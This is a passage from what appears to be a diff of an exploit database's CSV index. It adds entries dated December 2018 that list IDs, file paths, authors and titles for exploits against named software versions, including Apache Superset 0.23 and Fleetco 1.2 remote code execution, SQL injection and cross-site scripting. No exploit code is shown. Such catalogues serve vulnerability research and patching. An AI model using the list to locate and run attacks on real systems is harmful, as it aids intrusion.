Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40426,3 +40429,10 @@ id,file,description,date,author,type,platform,port 45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80 45918,exploits/hardware/webapps/45918.py,"Schneider Electric PLC - Session Calculation Authentication Bypass",2018-11-30,Photubias,webapps,hardware,80 45920,exploits/cgi/webapps/45920.txt,"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass",2018-11-30,LiquidWorm,webapps,cgi,80 +45927,exploits/php/webapps/45927.py,"Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution",2018-12-03,AkkuS,webapps,php,80 +45928,exploits/hardware/webapps/45928.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting",2018-12-03,Luca.Chiou,webapps,hardware,80 +45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80 +45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80 +45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80 +45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux, +45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80